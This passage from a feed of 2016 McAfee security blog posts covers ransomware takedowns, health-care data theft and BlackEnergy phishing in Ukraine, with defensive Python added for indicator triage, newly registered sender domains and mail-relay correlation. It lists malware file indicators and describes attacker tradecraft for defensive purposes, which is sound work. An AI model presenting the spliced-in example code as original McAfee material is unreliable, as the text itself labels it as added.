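     "process": r"C:\Windows\System32\trksrv.exe"},
    {"type": "file_create", "path": r"C:\Windows\System32\drdisk.sys",
     "process": r"C:\Windows\System32\netx.exe"},
    {"type": "file_create", "path": r"C:\Windows\System32\netx.pnf",
     "process": r"C:\Windows\System32\netx.exe"},
    {"type": "time_change", "old": "2016-11-17T20:45:00",
     "new": "2012-08-15T12:00:00"},
    {"type": "file_create",
     "path": r"C:\Users\alice\AppData\Local\Microsoft\Windows\Tmp765643.txt",
     "process": "powershell.exe"},
    {"type": "file_create",  # benign noise that must not match
     "path": r"C:\Users\alice\AppData\Local\Temp\report.txt",
     "process": "winword.exe"},
]

if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for label, ev in found:
        print(f"{label:32s} {ev.get('path') or ev.get('image') or ev.get('new')}")
    print("verdict:", verdict(found))
```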



Fight Against Ransomware Takes to the Cloud
https://securingtomorrow.mcafee.com/business/cloud-security/fight-ransomware-takes-cloud/
Tue, 08 Nov 2016 00:05:38 +0000

The post Fight Against Ransomware Takes to the Cloud appeared first on McAfee Blogs.
“How many visitors do you expect to access the No More Ransom Portal?”

This was the simple question asked prior to this law enforcement (Europol’s European Cybercrime Centre, Dutch Police) and private industry (Kaspersky Lab, McAfee) portal going live, which I didn’t have a clue how to answer. What do YOU think? How many people do you expect to access a website dedicated to fighting ransomware? If you said 2.6 million visitors in the first 24 hours, then please let me know six numbers you expect to come up in the lottery this weekend (I will spend time until the numbers are drawn to select the interior of my new super yacht). I have been a long-time advocate of public cloud technology, and its benefit of rapid scalability came to the rescue when our visitor numbers blew expected numbers out of the water. To be honest, if we had attempted to host this site internally, my capacity estimates would have resulted in the portal crashing within the first hour of operation. That would have been embarrassing and entirely my fault.

Indeed, my thoughts on the use of cloud computing technology are well documented in various blogs, my work within the Cloud Security Alliance, and the book I recently co-authored. I have often used the phrase, “Cloud computing in the future will keep our lights on and water clean.” The introduction of Amazon Web Services (AWS) and AWS Marketplace into the No More Ransom Initiative to host the online portal demonstrates that the old myth, “One should only use public cloud for noncritical services,” needs to be quickly archived into the annals of history.

To ensure such an important site was ready for the large influx of traffic at launch, we had around-the-clock support out of Australia and the U.S. (thank you, Ben Potter and Nathan Case from AWS!), which meant everything was running as it should and we could handle millions of visitors on our first day. This, in my opinion, is the biggest benefit of the cloud. Beyond scalability, and the benefits of outsourcing the management and the security of the portal to a third party, an added benefit was that my team and I could focus our time on developing tools to decrypt ransomware victims’ systems, conduct technical research, and engage law enforcement to target the infrastructure to make such keys available.

AWS also identified controls to reduce the risk of the site being compromised. With the help of Barracuda, they implemented these controls and regularly test the portal to reduce the likelihood of an issue.

Thank you, AWS and Barracuda, and welcome to the team! This open initiative is intended to provide a noncommercial platform to address a rising issue targeting our digital assets for criminal gain. We’re thrilled that we are now able to take the fight to the cloud.

Originally published on Amazon Web Services

The post Fight Against Ransomware Takes to the Cloud appeared first on McAfee Blogs.

A ‘Second Economy’ Prognosis for Health Care Cybersecurity https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/second-economy-prognosis-health-care-cybersecurity/ Wed, 26 Oct 2016 19:01:39 +0000

McAfee CTO Steve Grobman has pointed out that gaining the upper hand in cybersecurity requires that we extend our thinking beyond the physical economy of money, assets, goods, and services to a Second Economy defined by the currencies of trust, time, and money.

As in other industries, health care is working toward maximizing efficiencies, containing expenses, capturing revenues, and delivering enhanced services through networked devices. Unfortunately, the new opportunities also involve challenges born of a reliance on fragmented cybersecurity strategies built around siloed architectures, and a failure to recognize the value of the extensive data stores the health care sector manages. Losing intellectual property and business confidential information could destroy whole pharmaceutical or biotech companies. Losing personal, sensitive patient data could squander the precious currency of trust in digital medicine, in care providers, and their application of technology.

A McAfee Labs report released today details some of the consequences of health care industry players failing to appreciate the value of data, the attractiveness of that data to cybercriminals, and the ecosystem growing around the theft of such data. The report, Health Warning: Cyber Threats Targeting and Compromising the Health Industry, features three areas of focus.

The value of protected health information

In recent years, McAfee has observed the cybercriminal community extend its data theft efforts beyond financial account data to medical records.

Although credit and debit card numbers can be canceled and replaced quickly, this is not the case for protected health information (PHI), which does not change. This “nonperishable” PHI can include family names, mothers’ maiden names, social security or pension numbers, payment card and insurance data, and patient address histories. McAfee Labs found stolen medical records available for $0.03 to $2.42 per record.

Cybercriminals analyze the data, and perhaps cross-reference it with data stolen from other sources to identify lucrative fraud, theft, extortion, character assassination, or blackmail opportunities across the population of patients.

Targeting intellectual property

Our research and analysis on the targeting of biotechnology and pharmaceutical firms suggest that the economic value of their intellectual property and business confidential information is considerably higher than the cents- and dollars-per-record data McAfee’s researchers identified within patients’ health care accounts.

When you consider that research and development is a tremendous expense for these industries, it should be no surprise that cybercriminals are attracted to this category of data theft.

McAfee researchers found evidence that formulas for next-generation drugs, drug trial results, and other business confidential information constitute significant value. The stores of such data at pharmaceutical companies, their partners, and even government regulators involved in bringing new drugs to market have become premium targets of cybercriminals.

Ecosystem of health care data theft

McAfee also identified cybercriminals leveraging the cybercrime-as-a-service market to execute their attacks on health care organizations. Researchers found evidence of the purchase and rental of exploits and exploit kits to enable the system compromises behind health care data breaches. The researchers even observed efforts by cybercriminals, through online ads and social media, to recruit into their ranks health care industry insiders with access to valuable information.

The Second Economy challenge

The growth and evolution of the market for stolen health care data and the hacking skills required to steal it suggest that the business of cybercrime in this vertical industry is good and growing. Given the increasing threat to the industry, breach costs ought to be evaluated in new Second Economy terms—in which lost trust can inflict as much damage upon individuals and organizations as lost funds.

In health care, gaining the upper hand in cybersecurity means rejecting conventional defense paradigms in favor of radical new thinking. Where health care organizations have relied on old playbooks, they must be newly unpredictable. Where they have hoarded information on attacks, exploits, and threats, the industry must become more collaborative. Where they have undervalued cyber defense overall, they must prioritize it.

In the Second Economy, trust is the prime casualty of cybercrime. In an industry in which the personal is paramount, the loss of trust could be catastrophic to its progress and prospects for success.

The post A ‘Second Economy’ Prognosis for Health Care Cybersecurity appeared first on McAfee Blogs.

Wild West of Cybercrime: New Sheriff in Town https://securingtomorrow.mcafee.com/business/wild-west-cybercrime-new-sheriff-town/ Mon, 17 Oct 2016 16:01:05 +0000

Your data is held hostage by criminals. Do you a) pay them, or b) lose your data forever?

Until recently these were the only options for the many victims of ransomware. That changed in July 2016, when law enforcement and the private sector got together to launch the NoMoreRansom portal. Not only does it provide advice on how best to prevent such infections, it also provides a set of tools that allow victims to decrypt their data. This gave victims a third option: c) don’t pay the bad guys and get your data back.

Progress has been impressive: since July the number of tools has doubled, covering more than eight ransomware families. These tools have successfully decrypted over 2,500 infections in that short time. To put this into context, there were more than 2,000 instances in which people did not have to pay criminals to get their data back. In turn, the portal was responsible for keeping in excess of €1 million out of the pockets of criminals.

All of which brings us to today. We launched the portal in July with the European Cybercrime Centre, Dutch Police, Kaspersky Lab, and McAfee. Now we are delighted to announce the inclusion of 13 new partners from law enforcement: in Bosnia and Herzegovina, Bulgaria, Colombia, France, Hungary, Ireland, Italy, Latvia, Lithuania, Portugal, Spain, Switzerland and the United Kingdom.

We often hear talk of public-private partnerships and although this rhetoric is often lauded, this initiative demonstrates a true practical example of this approach, and what can be achieved when we work together—not only in creating tools to return data held hostage, but also in raising awareness of ransomware by providing proactive measures to prevent infections.

Ransomware is a growth industry. One can argue it is the poster child of modern cybercrime, with huge revenues for criminals. It impacts consumers, and now specifically targets sectors such as education, health care, and government. It has a detrimental effect on modern businesses across the globe. Without our taking a stand, ransomware will continue to fund criminal activities and motivate cybercriminals to invest more in further nefarious initiatives. We must all take a stand, whether this is industry providing technical support to law enforcement in their efforts to disrupt criminal infrastructure, or an infected victim simply not paying and using the tools provided by NoMoreRansom.

We all have a role in this fight. NoMoreRansom may appear to be only a website fighting ransomware, but in truth it represents so much more.

The post Wild West of Cybercrime: New Sheriff in Town appeared first on McAfee Blogs.

‘Wildfire’ Ransomware Extinguished by Tool From NoMoreRansom; Unlock Files for Free https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/wildfire-ransomware-extinguished-tool-nomoreransom-unlock-files-free/ Tue, 23 Aug 2016 18:30:41 +0000

McAfee and Kaspersky Lab, partners in the project NoMoreRansom, are pleased to announce today the availability of a decryption tool for victims of the Wildfire variant of ransomware. This tool is available following successful collaboration with the Dutch police and the European Cybercrime Centre. This strong public-private partnership has led to the seizure of criminal infrastructure and has resulted in the availability of the decryption tool.

Victims know they have been infected with Wildfire because they see the following message:

[Image: Ransomware notice.]

Most of the victims of Wildfire are in the Netherlands and Belgium. Although this message requests a ransom of 1.5 Btc, the reality is that most victims paid between 0.5 and 0.6 Btc. Apparently, the actors accepted a negotiation in some cases.

Wildfire has spread primarily through Dutch spam emails from transport companies, targeted at Dutch speakers. The victims were misled with a notice of a “missed” delivery and instructions for scheduling a new delivery by filling in a “special form” attached to the mail. This form was in fact an obfuscated dropper that infected the victims with the ransomware. The following screenshot is typical of the many spam mails:

[Image: Spam email aimed at Dutch speakers.]

The domain transportbedrijfpeters.nl, used in the preceding mail, was first seen on May 17, associated with a P.O. box company in the United Arab Emirates. May 18 was the date of the spam mail. There is nothing illegal about this, but it raises a lot of suspicion.

The domains used in all the Wildfire spam mails that we researched were registered between the end of May and August this year, the height of the Wildfire campaign. Another remarkable thing about the spam mails is that they contain addresses of real businesses in the Netherlands.

The actors behind Wildfire have clearly put a lot of effort into making their spam mails look credible and very specific. Because of these elements, we would not be surprised if there is a Dutch-speaking group involved.
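The pattern described above, a sender domain registered only a day or a few weeks before the spam that uses it, is something a mail gateway or SOC can check for. The following is an added example, not code from the original post or from McAfee: it flags inbound messages whose sender domain is younger than a configurable number of days. It assumes a WHOIS/RDAP creation-date lookup, which is stubbed here with a constructed table; only transportbedrijfpeters.nl and the May 17/18 dates come from the post, and every other domain, address, subject and date is invented for illustration.

```python
"""Domain-age heuristic for inbound mail (added example, constructed data)."""
from datetime import date

# Constructed stand-in for a WHOIS / RDAP "creation date" lookup.
# Only transportbedrijfpeters.nl and its May 17, 2016 date come from the post;
# the remaining entries are invented for this example.
REGISTRATION_DATES = {
    "transportbedrijfpeters.nl": date(2016, 5, 17),
    "example-courier.nl": date(2009, 3, 2),
    "pakketdienst-nieuw.nl": date(2016, 7, 30),
}

# Constructed sample of inbound messages: (date received, From address, subject).
SAMPLE_MAIL = [
    (date(2016, 5, 18), "info@transportbedrijfpeters.nl", "Gemiste levering"),
    (date(2016, 5, 18), "noreply@example-courier.nl", "Uw zending is onderweg"),
    (date(2016, 8, 1), "klantenservice@pakketdienst-nieuw.nl", "Nieuwe afspraak"),
    (date(2016, 8, 1), "bob@unknown-domain.test", "Factuur"),
]


def sender_domain(addr):
    """Lower-cased domain part of an e-mail address."""
    return addr.rsplit("@", 1)[-1].strip().lower()


def domain_age_days(domain, seen_on, registry=REGISTRATION_DATES):
    """Days between registration and the observed message date; None if unknown."""
    created = registry.get(domain)
    if created is None:
        return None
    return (seen_on - created).days


def classify(mail, max_age_days=30, registry=REGISTRATION_DATES):
    """Label one message by the age of its sender domain on the day it arrived."""
    seen_on, sender, subject = mail
    domain = sender_domain(sender)
    age = domain_age_days(domain, seen_on, registry)
    if age is None:
        verdict = "unknown-domain"      # no registration record: cannot vouch for it
    elif age < 0:
        verdict = "clock-skew"          # message predates registration: bad data or forged date
    elif age <= max_age_days:
        verdict = "newly-registered"    # the Wildfire pattern: domain younger than the window
    else:
        verdict = "established"
    return {"domain": domain, "age_days": age, "verdict": verdict, "subject": subject}


def flagged(mails=SAMPLE_MAIL, max_age_days=30, registry=REGISTRATION_DATES):
    """Return the messages that warrant a closer look before delivery."""
    return [r for r in (classify(m, max_age_days, registry) for m in mails)
            if r["verdict"] in ("newly-registered", "unknown-domain", "clock-skew")]


if __name__ == "__main__":
    for r in flagged():
        print(f"{r['verdict']:17} {r['domain']:30} age={r['age_days']} subject={r['subject']!r}")
```

In production the lookup table would be replaced by an RDAP query or a passive-DNS "first seen" feed, and the verdict would feed a quarantine or a SIEM alert rather than a print; the 30-day window is a tunable assumption, not a figure from the post.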

Once victims are infected, they see the ransom note, as shown above. To make the payment, the victim has to connect to a .RU or .SU domain. These domains act as a proxy to connect the victim to the control server, which was hosted on the Dark Web. We believe the actors did this to keep the site out of search-engine crawlers and results, and to be as stealthy as possible when accessing their services.

Thanks to our public-private partnership we were able to take a look at Wildfire’s control server panel. The main panel has the following campaign details:

[Image: Wildfire campaign overview.]

We see from this overview that in the last 31 days the campaign infected 5,309 systems and earned total revenue of about 136 BTC (€70,332). Not a bad “paycheck” for a month.

When we look at the “clients” page, we see, per victim, the country, the Bitcoin address, the ransom amount, the number of encrypted files, and the payment status:

ID  UID      Country  BTCaddress         BTCamount  Filecount   Paidstatus
1   a5*****  BE       1J***************  0.6        11673       0
2   aa*****  NL       1F***************  0.5        1469031280  0
3   fd*****  BE       1H***************  0.6        68595       0
4   08*****  NL       ZC***************  0.5        1469079732  0
5   05****   NL       GH**************   0.5        1469605876  0

Overview of victims’ file data.

A table marked as RID with the value “aff_001” might indicate an affiliate program, in which “aff_001” could stand for “Affiliate_001.”

When we take a closer look at the source code of the control server, we see some indicators that make us believe Wildfire is an affiliate-based ransomware-as-a-service (RaaS). The index.php page of the server contains a comment in Russian:

[Image: Russian comments on the control server.]

The Cyrillic text “исправить таймер” means “fix timer” and refers to the timer function of the ransomware. Another indicator in the config file of the source code is a list of exempted countries. Wildfire will not encrypt victims from certain countries.

[Image: Exempted countries in Eastern Europe.]

This list is a strong indicator that we are dealing with an Eastern European group. This is not surprising; we have seen this behavior with many other ransomware variants, including CryptoWall.

We would not be surprised if Wildfire is indeed an example of RaaS. The malware shows a very close resemblance to the ransomware variant Zyklon. Another possible giveaway is the difference between the source code found on the control server and the very specific Dutch/Belgian infection vectors found in the spam mails. They are too far apart in language to come from the same actor group. It is worrisome to see large-scale extortion by ransomware made so easily available to so many criminals.

Today, however, the victims of Wildfire no longer have to face the difficult choice of either paying criminals or sacrificing their data. The availability of this decryption tool allows victims to reclaim their data without having to pay anyone. The initial tool includes 1,600 keys for Wildfire, and more will be added in the near future. This is another result of the NoMoreRansom public-private partnership.

The post ‘Wildfire’ Ransomware Extinguished by Tool From NoMoreRansom; Unlock Files for Free appeared first on McAfee Blogs.

McAfee Teams With Industry, Law Enforcement to Thwart ‘Shade’ Ransomware https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-teams-industry-law-enforcement-thwart-shade-ransomware/ Mon, 25 Jul 2016 09:00:12 +0000

McAfee, Europol, Kaspersky Lab, and Dutch police have taken down the Shade ransomware botnet and captured encryption keys to unlock victims’ systems.

Although we talk a great deal of the value of public-private partnerships in the fight against cybercrime, few events in the cybersecurity field are more inspiring than seeing such collaboration in action and scoring wins.

Today, McAfee announces a collaborative victory with Europol, Kaspersky Lab, and the Dutch police’s National High Tech Crime Unit (NHTCU). Together these players have successfully taken down the control servers operating the Shade ransomware. Furthermore, McAfee and Kaspersky Lab have leveraged cryptographic keys captured in the takedown to develop decryption tools capable of unlocking systems infected by the ransomware. These tools are available free of charge as a part of the “No-More-Ransom” project, an initiative to share ransomware threat intelligence, coordinate malware campaign takedowns, educate users on how to protect themselves, report ransomware attacks, and provide tools to unlock infected systems.

The Shade ransomware first appeared in late 2014, infecting users across Eastern and Central Europe through malicious websites and infected email attachments. The respective McAfee and Kaspersky Lab tools will provide relief to users infected with Versions 1 or 2 of the Shade malware. The McAfee tool can be downloaded at http://www.mcafee.com/us/downloads/free-tools/shadedecrypt.aspx.

“This initiative shows the value of public-private cooperation in taking serious action in the fight against cybercrime,” said Raj Samani, EMEA CTO for McAfee. “This collaboration goes beyond intelligence sharing, consumer education, and takedowns to help repair the damage inflicted upon victims. By restoring access to their systems, we empower users by showing them they can take action and avoid rewarding criminals with ransom payments.”

After slowing slightly in mid-2015, ransomware overall regained its rapid growth rate. According to the June 2016 McAfee Labs Threats Report, total ransomware grew 116% year-over-year for the period ending March 31. Total ransomware rose 26% from Q4 2015 to Q1 2016 as lucrative returns continued to draw relatively low-skilled criminals. An October 2015 Cyber Threat Alliance analysis of the CryptoWall V3 ransomware hinted at the financial scale of such campaigns. The researchers linked just one campaign’s operations to $325 million in victims’ ransom payments.

For more information on the No-More-Ransom initiative, please visit www.nomoreransom.org.

For more information on how users can protect themselves from ransomware in general, please visit Ransomware and You.

More information on ransomware can be found at www.mcafee.com/ransomware.

The post McAfee Teams With Industry, Law Enforcement to Thwart ‘Shade’ Ransomware appeared first on McAfee Blogs.

The Morning After: What Happens to Data Post-Breach? https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/morning-happens-data-post-breach/ Mon, 02 May 2016 19:13:17 +0000

This post first appeared on the security website Dark Reading.

We need consumers and businesses to not simply shrug off data breaches but to take active measures to protect their data. We are hopeful that new insights will provide a compelling answer to the question “So what?”

No company is bulletproof when it comes to the compromise of data; this is the resounding message from Verizon’s 2016 Data Breach Investigations Report (DBIR). With statistics detailing how many records have been compromised, the fundamental question that is often overlooked is “So what?”

I don’t mean to sound indifferent, but it is a response that we often hear. “Banks refund me anyway” and “Well, it’s just another notification letter. I get these all the time” are common refrains. Feeling numb to the dizzying statistics is a dangerous trend that, without correct education, could have significant repercussions for the data subjects who have been impacted.

To assist with that education, we have coauthored one section of the DBIR that explains what happens with data after a breach, in particular the monetization of stolen data and their associated markets. (McAfee contributed to this report by providing anonymized breach data. We also coauthored Appendix A, which focuses on post-breach fraud and what happens to data once it has been stolen from the breached entity. The report and more about our contribution can be found here.)

One of the biggest challenges we face when attempting to explain market pricing for stolen data is that not all data is created equally. How can we normalize various stolen data sets to establish “market prices?” In short, we cannot. It is for this reason that we focused instead on specific data sets—payment card information, financial account information, and medical data.

What is particularly significant is how inexpensive it is to purchase this type of data, with payment cards selling for the price of a cup of coffee. However, we were surprised by the sharp drop in the price of stolen payment cards over the last several years. Apparently, the law of supply and demand applies to all markets, including the criminal marketplace. With so many recent confirmed payment card breaches, there is only one direction for the market price of these cards to move—downward!

We are hopeful that such insights provide a compelling answer to the question “So what?” As a society, we are increasingly dependent on digital systems. We need consumers and businesses to not simply shrug off data breaches but to take active measures to protect their data and not give criminals a shortcut to becoming millionaires. As the European Cybercrime Centre states in the report, “Only through a coordinated effort involving all parties will we be in a position to tackle this threat.”

The post The Morning After: What Happens to Data Post-Breach? appeared first on McAfee Blogs.

Is Cloud Security An Exaggerated Concern? https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/cloud-security-exaggerated-concern/ Fri, 22 Apr 2016 13:00:43 +0000

Research indicates the challenge has never been about security, but about transparency.

The results are in: we have made zero progress since 2010. That was the year IDC published the results of a survey on cloud computing, which found that security was the biggest barrier to adoption. That statistic has found its way onto pretty much every presentation about cloud computing since.

Well, the year is 2016, and a recent McAfee study asked 1,200 IT decision-makers what their biggest concern is; the most common answer was data breaches. What is remarkable is that the next question asked respondents which issues they had actually experienced, and those were not security related. In fact, the biggest issue was the difficulty of migrating services or data. Incidentally, this is likely to get worse as platform-as-a-service and infrastructure-as-a-service become more ubiquitous.

This raises the question of whether security concerns are exaggerated. Indeed, those of you who have heard me speak know that I do not believe “cloud security” is even an issue as such. Firstly, the concept of cloud is misused. If we strictly adhere to the NIST definition in SP 800-145, then the number of service providers offering a cloud service is a lot smaller than Google results suggest.

One of the essential characteristics of a cloud service (per NIST) is on-demand self-service. In 2012, the website CloudSleuth investigated how many cloud service providers actually fulfilled this characteristic; its research found that “of the 20 companies we selected in this round, only 11 were fully self-serve, nine required some level of sales interaction, and astoundingly, three of those nine simply didn’t respond to our requests.”

It’s About Transparency

So the term “cloud service provider” in practical terms is simply a company offering computing resources over broad network access. (Thank you, NIST!) Now let’s move to the concern regarding security. The question is not whether a provider is secure — moving away from the argument over what constitutes secure or not. The challenge is how to determine the level of security of a provider. Therefore, the challenge has never been about security, but about transparency; in other words, how can you determine the security posture of a third-party provider without the ability to physically audit? Of course, annual audits have been the default tool of choice for many years now, but this model only provides a certain level of assurance.

Work within the Cloud Security Alliance (with whom we collaborated on this research) has begun to develop the necessary tools to provide the transparency so desperately needed. For example, STAR is a registry that documents the security controls deployed by providers. But perhaps the most encouraging tool is STAR Continuous Monitoring, which provides transparency of the security posture of a provider even after the auditor has left the building.

Perhaps for 2017 the concern of cloud security will not make it onto the opening slide of every presentation, and we can discuss the adoption of tools such as STAR that provide the requisite transparency into third-party providers. If there is concern about the security of a cloud provider, then the simple answer will be not to use them and to find a provider that satisfies the risk appetite of the end customer.

Read the original post on Dark Reading.

The post Is Cloud Security An Exaggerated Concern? appeared first on McAfee Blogs.

A Future Beyond Mobile Devices; Trusting the Promises of Mobile World Congress https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/a-future-beyond-mobile-devices-trusting-the-promises-of-mobile-world-congress/ Thu, 03 Mar 2016 18:41:19 +0000

More than 100,000 people descended upon Mobile World Congress (MWC) last week to watch experts from around the world discuss and share their views of what the future has in store for “mobile.”

After four days at the event, what became obvious to me is that we have certainly progressed from the days when a mobile phone was capable only of making calls, sending SMS messages, and playing the occasional game of Snake. The exhibition hall was packed full of companies showcasing the latest smartphone capabilities and Internet-connected devices that look to make mobile devices even more central to the way we live our lives. In fact, we can now use our phones to unlock car doors, control the heating in our homes, and monitor our health, all while on the move. What excited many industry experts, however, was virtual reality. It seems everyone was talking about it (as you can see from the word cloud, below). LG, HTC, and Facebook (to name just a few) made noise about their virtual reality products and Samsung even had its own virtual theater, allowing visitors to try their hands at snowboarding.

What was undoubtedly clear from MWC, then, is that future mobile technologies will go far beyond a smartphone. Companies, both well-known and those making a name for themselves, were keen to use the event to showcase just what experiences they are capable of delivering to their customers beyond a call, text, or casual Internet surf.

The networks supporting these devices, for example, were a much-discussed topic, with 5G taking center stage. Although this side of MWC tends to slip under the radar, many industry experts believe the rise of the Internet of Things will truly be successful only with the introduction of 5G. As such, the work going into building networks that can support the connected world was a hotly discussed topic, showing the sheer scale to which this mobile ecosystem is growing.

Evidently from MWC, 2016 is going to be an exciting year for innovation in mobile—one that it is going to excite consumers and pave the way for the connected world. But for this to be a success, we need to first and foremost address security. We know that where consumers go, criminals go too. And we only have to look at the figures to see that they are going to mobile devices: Our latest Mobile Threat Report found that 37 million mobile malware have been detected during the last six months.

Of course, the criminals are not after the devices; they want the valuable data. In his keynote, Facebook’s Mark Zuckerberg said that virtual reality will provide another level of tailored and emotional connection for brands and consumers alike, given the huge amount of personal data collected on the headset. But what happens when this data falls into the wrong hands? Today, unfortunately, it’s not a question of “if” but “when.”

In a world of 5G hyperconnectivity, in which more data gathering and devices will become more ingrained in our personal and professional lives, trusting the access given to personal information will be crucial. We need to do more today to set the stage. We need to first get right the security basics and establish that foundation of trust so that companies can deliver on the promises we’ve seen at MWC.

The biggest trends of MWC 2016: [word cloud image]

The post A Future Beyond Mobile Devices; Trusting the Promises of Mobile World Congress appeared first on McAfee Blogs.

Does Anyone Really Care About Mobile Security?
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/anyone-really-care-mobile-security/
Wed, 17 Feb 2016 14:00:06 +0000
I’ve attended Mobile World Congress a number of times and it is fair to say the concept of the show has evolved over the years. Previously, when someone said “mobile” we thought of physical handsets; whereas the term today has a much more complex definition. “Mobile” now is a reflection of the Internet of Things (IoT) and the hyperconnected world we live in.

You only have to look at the thousands of connected devices presented at CES—from wearables to smart refrigerators—to see the extent to which IoT will soon be ingrained in our everyday lives. But with more devices come more threats. And security needs to take center stage if users are going to trust their devices, especially as that trust has been tainted in light of the numerous breaches last year of high-profile companies such as TalkTalk and Ashley Madison. More users now demand to know their personal information cannot be compromised; we saw this shift when thousands of TalkTalk’s customers went elsewhere after the breach.

It’s worrying that some companies have not gotten the memo. Just last week we learned that VTech had updated its terms and conditions, and what I read filled me with despair. Under the new terms, VTech says families using its software do so at their “own risk.” The company places the entire security burden on its customers, claiming it is not liable in the case of future attacks by asking its customers to accept that “any information you send or receive during your use of the site may not be secure and may be intercepted or later acquired by unauthorized parties.”

When the company was hacked last year, more than 6.3 million children’s accounts were compromised, with conversations, photos, and video messages between families exposed. Do you want to live in a world in which companies can get away with this responsibility shift while selling us connected devices for our homes and for our children? I know I don’t. The implications of such a stance becoming the norm are worrying. Although the Information Commissioner’s Office has stated that the responsibility of protecting data does lie with the manufacturer, I question whether market pressure (customers) will demand better security.

Organizations have a duty to care for their customers. If the consumers companies want to reach are ever going to fully adopt these technologies, trust between the two parties will have to evolve.

This Mobile World Congress, we will be exposed to a world of exciting new technologies and opportunities as we move into an even more connected future. But as we acknowledge the move beyond the traditional handset to the new generation of digital devices, we need to address the issues around privacy, security, and control that come with them. As connected devices become more common and essential to our lives, security basics need to be the priority, right from the start. Without first establishing a foundation of trust, the exciting prospect of 5G and the wider future of IoT will fundamentally fail.

The post Does Anyone Really Care About Mobile Security? appeared first on McAfee Blogs.

A Case of Mistaken Identity? The Role of BlackEnergy in Ukrainian Power Grid Disruption
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/blackenergy_ukrainian_power_grid/
Fri, 05 Feb 2016 22:20:36 +0000
Recent reports of electricity outages across Ukraine have led to significant speculation regarding the specific malware used to disrupt supplies. McAfee’s approach to understanding this event included contacting the impacted organization to offer our support and, where possible, retrieving data in order to analyze the true nature of the threat. In this case the impacted organization allowed us to publicly share our findings to benefit the entire industry. Researchers from the Advanced Programs Group (APG) team within McAfee were able to analyze multiple samples used in an attack, raising questions regarding the role of BlackEnergy in disrupting the supply of electricity. We would also like to acknowledge the support our partner BAKOTECH Group provided in the technical investigation.

This post builds upon our initial blog posting that detailed the historical evolution of BlackEnergy.

It begins with a phish

Our malware “zoo” within McAfee Labs contains a wealth of data that can be used to identify the reuse of tools in a particular attack. In this instance we cross-referenced the initial dropper and collected samples that were used by infected systems. This was absolutely necessary because the criminal infrastructure used to host the second malware instance was offline when our analysis began. As we began, we identified a number of similarities with previous campaigns that targeted the energy sector.

In March 2015, an email appearing to be from the Supreme Council of Ukraine (Verkhovna Rada of Ukraine) was sent to multiple state institutions in the country. One of the targets in this campaign was a power company situated in the western part of the Ukraine. The spear-phishing email contained an XLS attachment with a macro in it.


Once the document was opened, a macro was executed, the BlackEnergy dropper was created, and the dropper started to download the final BlackEnergy 2/3 version.

One of the interesting email artifacts was a part of the SMTP header that pointed to the IP address and name of the mail server used to send the spear-phishing emails.

We received information that, once the attackers were in the network, they compromised a web server and used it as a beachhead for entering a segment of the company’s network. The attackers were using tools that are freely available on the Internet for download, including web shells, tunneling tools, and SSH server tools.

If we compare the previous attack with the BlackEnergy attack on the grid reported in December, we can recognize a number of similarities. First, the attack vector is exactly the same, namely a spear-phishing campaign. An example of the content of the email follows:

[Image: example of the spear-phishing email content]

The attachment was a weaponized Excel worksheet containing a dropper. Once launched, the payload was downloaded from a site hosted in the Ukraine.

We investigated the SMTP headers in this case and found that the attack in December leveraged a mail server with the same IP address and name as a server used in the previously described campaign in March. The energy sector was one of the targets in both campaigns.
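The header correlation described above, as an added example that is not part of McAfee’s post: it parses the Received headers of two constructed spear-phishing messages with Python’s standard library and reports which relaying mail servers (host name plus IP) are shared across campaigns. All host names, IP addresses and message contents are constructed placeholders.

```python
"""Correlate the relaying mail server across spear-phishing campaigns.

Added example (not McAfee's code). The post observed that the March and
December campaigns used a mail server with the same IP address and name,
visible in the SMTP Received headers. This script extracts the (host, ip)
of every relay that handed a message in and reports relays seen in more
than one campaign. Hosts, IPs and messages below are constructed samples.
"""
import ipaddress
import re
from collections import defaultdict
from email import message_from_string

# "from <helo> (<reverse-dns> [<ip>])" or "from <helo> [<ip>]" as most MTAs write it.
RECEIVED_FROM = re.compile(
    r"from\s+(?P<helo>\S+)\s*(?:\((?P<rdns>[^\s\[\]]*)\s*)?\[(?P<ip>[0-9a-fA-F.:]+)\]",
    re.IGNORECASE,
)

# Constructed sample messages; the headers are placeholders, not real captures.
MARCH_PHISH = """Received: from localhost [127.0.0.1]
\tby mx1.victim-utility.invalid with ESMTP id abc123;
\tMon, 2 Mar 2015 09:12:01 +0200
Received: from mail.relay-host.invalid (mail.relay-host.invalid [203.0.113.10])
\tby mx1.victim-utility.invalid with ESMTP id def456;
\tMon, 2 Mar 2015 09:11:58 +0200
From: info@parliament.invalid
To: ops@victim-utility.invalid
Subject: Notice (constructed sample)

See the attached spreadsheet.
"""

DECEMBER_PHISH = """Received: from inbound.grid-operator.invalid (inbound.grid-operator.invalid [192.0.2.20])
\tby mailstore.grid-operator.invalid with ESMTP id ghi789;
\tTue, 15 Dec 2015 14:02:11 +0200
Received: from mail.relay-host.invalid (mail.relay-host.invalid [203.0.113.10])
\tby inbound.grid-operator.invalid with ESMTP id jkl012;
\tTue, 15 Dec 2015 14:02:09 +0200
From: info@regional-office.invalid
To: dispatch@grid-operator.invalid
Subject: Updated schedule (constructed sample)

See the attached document.
"""


def relays_from_message(raw: str, skip_loopback: bool = True) -> list[tuple[str, str]]:
    """Return (host, ip) for each 'Received: from ...' hop, outermost hop first.

    The reverse-DNS name is preferred over the HELO name because the HELO
    string is chosen by the sender. Loopback hops (local delivery) carry no
    infrastructure information and are skipped by default.
    """
    hops = []
    for value in message_from_string(raw).get_all("Received", []):
        flat = " ".join(value.split())  # unfold the header onto one line
        m = RECEIVED_FROM.search(flat)
        if not m:
            continue
        ip = m.group("ip")
        try:
            if skip_loopback and ipaddress.ip_address(ip).is_loopback:
                continue
        except ValueError:
            continue  # bracketed text was not an IP literal; ignore this hop
        host = (m.group("rdns") or m.group("helo")).lower()
        hops.append((host, ip))
    return hops


def shared_relays(campaigns: dict[str, list[str]]) -> dict[tuple[str, str], set[str]]:
    """Map each (host, ip) relay to the campaigns that used it; keep only relays
    seen in two or more campaigns."""
    seen: dict[tuple[str, str], set[str]] = defaultdict(set)
    for name, messages in campaigns.items():
        for raw in messages:
            for hop in relays_from_message(raw):
                seen[hop].add(name)
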